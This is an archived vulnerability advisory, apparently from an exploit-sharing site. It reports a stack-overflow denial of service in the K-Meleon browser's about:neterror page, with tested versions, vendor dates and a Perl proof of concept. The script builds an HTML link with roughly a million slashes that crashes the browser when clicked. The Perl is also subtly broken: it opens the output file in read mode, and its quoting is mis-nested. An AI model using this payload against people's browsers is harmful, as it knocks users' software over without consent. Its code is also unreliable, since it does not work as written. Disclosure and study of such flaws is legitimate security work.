K-Meleon for windows about neterror Stack Overflow DoS
Posted on 14 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>K-Meleon for windows about neterror Stack Overflow DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== K-Meleon for windows about neterror Stack Overflow DoS ====================================================== ############################################ K-Meleon for windows about:neterror Stack Overflow DoS Vendor URL:http://kmeleon.sourceforge.net/ Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html Vendor notified:Yes exploit available: YES Category : Remote DoS ############################################ K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems. K-Meleon is prone vulnerable to crashing with a very long URL... Internal web pages like about:neterror does not limit the amount of chars that a user put in 'c' 'd' params and them if we compose a malformed url the browser can be chash easy.This issue is exploitable via web links like click here or via window.location.replace('very long url') or similar vectors. ################# Versions Tested ################# I have tested this issue in win xp sp3 and a windows 7 fully pached. Win XP sp3: K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes ) K-Meleon 1.6.0a4 Vulnerables.(crashes) windows 7 Ultimate: K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes) K-Meleon 1.6.0a4 Vulnerables.(crashes) ############ References ############ Discovered: 29-07-2010 vendor notify:31-07-2010 Vendor Response: Vendor patch: ################ #Proof Of Concept ################ ####################################################################### #!/usr/bin/perl # k-meleon Long "a href" Link DoS # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com # k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS # generate the file open it with k-keleon click in the link and wait a seconds ###################################################################### $archivo = $ARGV[0]; if(!defined($archivo)) { print "Usage: $0 <archivo.html> "; } $cabecera = "<html>" . " "; $payload = "<a href="about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "">click here if you can :)</a>" . " "; $fin = "</html>"; $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; close(FILE); exit; ################## EOF ###################### ############## Related Links ############## vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474 Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776 ###################### €nd ############################# Thnx to Phreak for support and let me undestanding the nature of this bug thnx to jajoni for test it in windows 7 X64 bits version. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente.... # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
